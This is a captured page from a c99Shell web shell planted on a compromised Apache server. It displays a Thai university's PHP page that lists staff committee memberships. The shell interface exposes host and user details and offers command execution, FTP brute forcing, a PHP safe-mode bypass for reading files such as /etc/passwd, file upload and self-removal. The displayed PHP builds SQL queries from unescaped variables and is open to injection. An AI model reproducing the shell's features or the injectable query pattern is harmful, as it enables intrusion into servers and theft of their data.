!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 51.23 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     PerCommitList.php (21.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("./include/FunctionDB.php");
include(
"admin_menu.php");
include(
"./include/Function.php");
ConnectDB();
$sql "Select * From personal_tb Where Teacher_code='$Teacher_code'";
$result mysql_query($sql) or die(" Error1").mysql_error();
$row mysql_fetch_array($result);
$sql2 "Select * From committee_tb WHERE Teacher_code='$Teacher_code'";
$result2 mysql_query($sql2) or die(" Error2").mysql_error();
$num mysql_num_rows($result2);
?> 

<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">

<style type="text/css">
<!--
.sidenav {    border-right-width: 1px;
    border-right-color: #EEEEEE;
    border-right-style: solid;
}
-->
</style>
<table width="840" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="840" ><br> 
          <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php">หน้าหลัก</a> <img src="./picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="menuEdu.php">ข้อมูลฝ่ายวิชาการ</a> <img src="./picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"> <a href="Menu_Faculty.php">ข้อมูลในหน่วยงาน</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="./picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" />ข้อมูลการเป็นกรรมการให้บริการวิชาการแก่สังคม</font></legend>
            <label>
  <form id="form1" name="form1" method="post" action="">
    <table width="845" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr bordercolor="#E7FAFE" bgcolor="#E7FAFE">
        <td nowrap="nowrap" bgcolor="#FFFFFF"><font size="2" face="Tahoma"><img src="./picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></td>
      </tr>
      <tr bordercolor="#E7FAFE" bgcolor="#E7FAFE">
        <td nowrap="nowrap" bgcolor="#FFFFFF">&nbsp;</td>
      </tr>
      <tr bordercolor="#E7FAFE" bgcolor="#E7FAFE">
        <td nowrap="nowrap" bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#006699" style="border:0px solid gray">
              <tr bgcolor="#AED7FF">
                <td height="25" colspan="4" bgcolor="#FFFFFF" ><font color="#003366" size="2" face="Tahoma"><?php echo $row[First_name] ;?>&nbsp; <?php echo $row[Teacher_name] ;?></font> <font color="#003366" size="2" face="Tahoma"> &nbsp;<?php echo $row[Teacher_lastname] ;?></font> </td>
              </tr>
              <tr bordercolor="#0066CC" bgcolor="#CCE6FF">
                <td colspan="2" align="center" bgcolor="#CCE6FF" style="border:1px solid gray">&nbsp;</td>
                <td width="171" align="center" bgcolor="#CCE6FF" style="border:1px solid gray"><font size="1" face="Tahoma">แยกประเภทตาม 
                  สมศ. 3.2 (กค 50)</font></td>
                <td align="center" style="border:1px solid gray"><font size="1" face="Tahoma">แยกประเภทตามการเป็นกรรมการ</font> <font size="1" face="Tahoma">ให้บริการวิชาการอื่นฯ</font></td>
              </tr>
              <tr bordercolor="#0066CC" bgcolor="#CCE6FF">
                <td width="34" height="26" align="center" bgcolor="#DFEBF9" style="border:1px solid gray"><font color="#000000" size="1" face="Tahoma">ลำดับ</font></td>
                <td width="232" align="center" bgcolor="#DFEBF9" style="border:1px solid gray"><font color="#000000" size="2" face="Tahoma">ชื่อเรื่อง</font></td>
                <td align="center" style="border:1px solid gray"><table width="99%" height="35" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr bgcolor="#DFEBF9">
                      <td width="25%" style="border:1px solid gray"><div align="center"><font size="1" face="Tahoma">วิชาการ</font></div></td>
                      <td width="25%" style="border:1px solid gray"><div align="center"><font size="1" face="Tahoma">วิชาชีพ</font></div></td>
                      <td width="25%" style="border:1px solid gray"><div align="center"><font size="1" face="Tahoma">วิทยานิพนธ์</font></div></td>
                    </tr>
                </table></td>
                <td width="330" align="center" style="border:1px solid gray"><table width="100%" height="37" border="0" align="center" cellpadding="0" cellspacing="2">
                    <tr bgcolor="#DFEBF9">
                      <td width="20%" style="border:1px solid gray"><div align="center"><font size="1" face="Tahoma">ตรวจเครื่องมือ</font></div></td>
                      <td width="20%" style="border:1px solid gray"><div align="center"><font size="1" face="Tahoma">คปสข.10</font></div></td>
                      <td width="20%" style="border:1px solid gray"><div align="center"><font size="1" face="Tahoma">ครือข่าย 
                                ภาคกลาง</font>1</div></td>
                      <td width="20%" bgcolor="#DFEBF9" style="border:1px solid gray"><div align="center">
                        <div align="center"><font size="1" face="Tahoma">การเป็นวิทยากร</font></div>
                      </div></td>
                      <td width="20%" style="border:1px solid gray"><div align="center"><font size="1" face="Tahoma">กรรมการ 
                        อื่นๆ</font></div></td>
                    </tr>
                </table></td>
              </tr>
              <?
  $i 
1;
 while(
$rs2 mysql_fetch_array($result2) )
 {

     if(
$count==0)
     {
?>
              <tr bgcolor="#F9FEFF">
                <td align="center" bgcolor="#FFFFFF"><font size="1" face="Tahoma"><?echo $i?></font></td>
                <td bgcolor="#FFFFFF"><font size="2" face="Tahoma"> <? echo $rs2[Title]?></font></td>
                <td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr>
                      <td width="25%" height="18"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Edu]?></font></div></td>
                      <td width="25%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Edu_job]?></font></div></td>
                      <td width="25%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Tsis]?></font></div></td>
                    </tr>
                </table></td>
                <td bgcolor="#FFFFFF"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="2">
                    <tr>
                      <td width="20%" height="18"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Check_tool]?></font></div></td>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Scp10]?></font></div></td>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Club_bcnlp]?></font></div></td>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[North_network]?></font></div></td>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Else_commit]?></font></div></td>
                    </tr>
                </table></td>
              </tr>
              <?
    $count
=1;
     }
else
{
?>
              <tr bordercolor="#FFFFFF" bgcolor="#FFFFFF">
                <td align="center"><font size="1" face="Tahoma"><?echo $i?></font></td>
                <td><font size="2" face="Tahoma"><? echo $rs2[Title]?></font></td>
                <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr>
                      <td width="25%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Edu]?></font></div></td>
                      <td width="25%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Edu_job]?></font></div></td>
                      <td width="25%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Tsis]?></font></div></td>
                    </tr>
                </table></td>
                <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="2">
                    <tr>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Check_tool]?></font></div></td>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Scp10]?></font></div></td>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Club_bcnlp]?></font></div></td>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[North_network]?></font></div></td>
                      <td width="20%"><div align="center"><font color="#0033CC" size="2" face="Tahoma"><? echo $rs2[Else_commit]?></font></div></td>
                    </tr>
                </table></td>
              </tr>
              <?
$count
=0;
}
$i++;
 }    
?>
            </table>            
            <table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" >
              <tr>
                <td width="53%" bgcolor="#FFFFFF"><div align="center"><font color="#003366" size="2" face="Tahoma">จำนวนการเป็นกรรมการ 
                  (แยกตามประเภท)</font></div></td>
                <td width="18%"><table width="99%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#FFFFFF">
                    <tr>
                      <td width="25%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
              $Teacher_code 
$row[Teacher_code];
           
$sql1 "Select * From committee_tb Where Edu='Yes' AND Teacher_code='$Teacher_code' AND Year_com='$Year_com'";
           
$result1 mysql_query($sql1);
           
$Srs1 mysql_num_rows($result1);
            echo 
$Srs1;
          
          
?>
                      </font></div></td>
                      <td width="25%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
                        $Teacher_code 
$row[Teacher_code];
           
$sql5 "Select * From committee_tb Where Edu_job='Yes' AND Teacher_code='$Teacher_code' ";
           
$result5 mysql_query($sql5);
           
$Srs5 mysql_num_rows($result5);
            echo 
$Srs5;
          
          
?>
                      </font></div></td>
                      <td width="25%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
             $Teacher_code 
$row[Teacher_code];
           
$sql8 "Select * From committee_tb Where Tsis='Yes' AND Teacher_code='$Teacher_code' ";
           
$result8 mysql_query($sql8);
           
$Srs8 mysql_num_rows($result8);
            echo 
$Srs8;
          
          
?>
                      </font></div></td>
                    </tr>
                </table></td>
                <td width="29%" colspan="2"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql1 "Select * From committee_tb Where Check_tool='Yes' AND Teacher_code='$Teacher_code' ";
           
$result1 mysql_query($sql1);
           
$rs10 mysql_num_rows($result1);
            echo 
$rs10;
          
          
?>
                      </font></div></td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql8 "Select * From committee_tb Where Scp10 ='Yes' AND Teacher_code='$Teacher_code' AND Year_com='$Year_com' ";
           
$result8 mysql_query($sql8);
           
$rs11 mysql_num_rows($result8);
            echo 
$rs11;
          
          
?>
                      </font></div></td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql5 "Select * From committee_tb Where Club_bcnlp='Yes' AND Teacher_code='$Teacher_code'  ";
           
$result5 mysql_query($sql5);
           
$rs12 mysql_num_rows($result5);
            echo 
$rs12;
          
          
?>
                      </font></div></td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql5 "Select * From committee_tb Where North_network='Yes' AND Teacher_code='$Teacher_code' ";
           
$result5 mysql_query($sql5);
           
$rs13 mysql_num_rows($result5);
            echo 
$rs13;
          
          
?>
                      </font></div></td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql8 "Select * From committee_tb Where Else_commit ='Yes' AND Teacher_code='$Teacher_code' ";
           
$result8 mysql_query($sql8);
           
$rs14 mysql_num_rows($result8);
            echo 
$rs14;
          
          
?>
                      </font></div></td>
                    </tr>
                </table></td>
              </tr>
              <tr>
                <td bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">จำนวนการไม่เป็นกรรมการ 
                  (แยกตามประเภท) </font></div></td>
                <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr>
                      <td width="25%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
                        $Teacher_code 
$row[Teacher_code];
           
$sql3 "Select * From committee_tb Where Edu='No' AND Teacher_code='$Teacher_code' ";
           
$result3 mysql_query($sql3);
           
$Srs3 mysql_num_rows($result3);
            echo 
$Srs3;
          
          
?>
                      </font></div></td>
                      <td width="25%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
                        $Teacher_code 
$row[Teacher_code];
           
$sql6 "Select * From committee_tb Where Edu_job='No' AND Teacher_code='$Teacher_code' ";
           
$result6 mysql_query($sql6);
           
$Srs6 mysql_num_rows($result6);
            echo 
$Srs6;
          
          
?>
                      </font></div></td>
                      <td width="25%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
                        $Teacher_com 
$row[Teacher_code];
           
$sql8 "Select * From committee_tb Where Tsis='No' AND Teacher_code='$Teacher_code' ";
           
$result8 mysql_query($sql8);
           
$Srs9 mysql_num_rows($result8);
            echo 
$Srs9;
          
          
?>
                      </font></div></td>
                    </tr>
                </table></td>
                <td colspan="2"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql1 "Select * From committee_tb Where Check_tool='No' AND Teacher_code='$Teacher_code' ";
           
$result1 mysql_query($sql1);
           
$rs15 mysql_num_rows($result1);
            echo 
$rs15;
          
          
?>
                      </font></div></td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql8 "Select * From committee_tb Where Scp10 ='NO' AND Teacher_code='$Teacher_code' ";
           
$result8 mysql_query($sql8);
           
$rs16 mysql_num_rows($result8);
            echo 
$rs16;
          
          
?>
                      </font></div></td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql5 "Select * From committee_tb Where Club_bcnlp='No' AND Teacher_code='$Teacher_code' ";
           
$result5 mysql_query($sql5);
           
$rs17 mysql_num_rows($result5);
            echo 
$rs17;
          
          
?>
                      </font></div></td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql5 "Select * From committee_tb Where North_network='No' AND Teacher_code='$Teacher_code' ";
           
$result5 mysql_query($sql5);
           
$rs18 mysql_num_rows($result5);
            echo 
$rs18;
          
          
?>
                      </font></div></td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#993333" size="2" face="Tahoma">
                          <?php 
           $Teacher_code 
$row[Teacher_code];
           
$sql8 "Select Count(Else_commit ) as sum8 From committee_tb Where Else_commit ='No' AND Teacher_code='$Teacher_code'";
           
$result8 mysql_query($sql8);
           
$rs19 mysql_num_rows($result8);
            echo 
$rs19;
          
          
?>
                      </font></div></td>
                    </tr>
                </table></td>
              </tr>
              <tr>
                <td bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">จำนวนการเป็นกรรมการวิชาการ/วิชาชีพ/วิทยานิพนธ์</font></div></td>
                <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr>
                      <td width="25%">&nbsp;</td>
                      <td width="25%">&nbsp;</td>
                      <td width="25%" bgcolor="#FFFFFF"><div align="center"><font color="#009966" size="2" face="Tahoma">
                          <?php
                 $SumCommit 
$Srs1 $Srs5 $Srs8;
                 echo
"$SumCommit";
            
?>
                      </font></div></td>
                    </tr>
                </table></td>
                <td colspan="2"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr>
                      <td width="20%" bgcolor="#FFFFFF">&nbsp;</td>
                      <td width="20%" bgcolor="#FFFFFF">&nbsp;</td>
                      <td width="20%" bgcolor="#FFFFFF">&nbsp;</td>
                      <td width="20%" bgcolor="#FFFFFF">&nbsp;</td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#009966" size="2" face="Tahoma">
                          <?php
                 $SumCommit 
$rs10 $rs11 $rs12 $rs13; + $rs14 ;
                 echo
"$SumCommit";
            
?>
                      </font></div></td>
                    </tr>
                </table></td>
              </tr>
              <tr>
                <td bgcolor="#FFFFFF"><div align="center"><font size="2" face="Tahoma">จำนวนการไม่เป็นกรรมการวิชาการ/วิชาชีพ/วิทยานิพนธ์</font></div></td>
                <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr>
                      <td width="25%">&nbsp;</td>
                      <td width="25%">&nbsp;</td>
                      <td width="25%" bgcolor="#FFFFFF"><div align="center"><font color="#FF0000" size="2" face="Tahoma">
                          <?php
                 $SumUCommit 
$Srs3 $Srs6 $Srs9;
                 echo
"$SumUCommit";
            
?>
                      </font></div></td>
                    </tr>
                </table></td>
                <td colspan="2"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
                    <tr bgcolor="#FCF4E9">
                      <td width="20%" bgcolor="#FFFFFF">&nbsp;</td>
                      <td width="20%" bgcolor="#FFFFFF">&nbsp;</td>
                      <td width="20%" bgcolor="#FFFFFF">&nbsp;</td>
                      <td width="20%" bgcolor="#FFFFFF">&nbsp;</td>
                      <td width="20%" bgcolor="#FFFFFF"><div align="center"><font color="#FF0000" size="2" face="Tahoma">
                          <?php
                 $SumCommit 
$rs15 $rs16 $rs17 $rs18 $rs19;
                 echo
"$SumCommit";
            
?>
                      </font></div></td>
                    </tr>
                </table></td>
              </tr>
              <tr bgcolor="#CCE6FF">
                <td colspan="4" bgcolor="#FFFFFF"><div align="center"><strong><font color="#003366" size="2" face="Tahoma">ทั้งหมด</font><font color="#FF0000" size="2" face="Geneva, Arial, Helvetica, sans-serif"> <? echo $num ?><font color="#003366" face="Tahoma"> เรื่อง</font></font></strong> </div></td>
              </tr>
            </table>            </td>
      </tr>
      
      <tr>
        <td width="693" ><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1">
          <tr>
            <td>&nbsp;</td>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td><font color="#FF0000" size="2" face="Tahoma">หมายเหตุ</font></td>
            <td><font size="2" face="Tahoma">&nbsp;</font></td>
          </tr>
          <tr>
            <td width="26%"><font size="2" face="Tahoma">์<font color="#0033CC">Yes</font> = เป็น</font></td>
            <td width="74%"><font size="2" face="Tahoma">&nbsp;</font></td>
          </tr>
          <tr>
            <td><font color="#0033CC" size="2" face="Tahoma">No</font><font size="2" face="Tahoma"> = ไม่เป็น</font></td>
            <td><font size="2" face="Tahoma">&nbsp;</font></td>
          </tr>
        </table></td>
      </tr>
    </table>
    </form>
          </fieldset>
        <br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><br>
      </font></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0181 ]--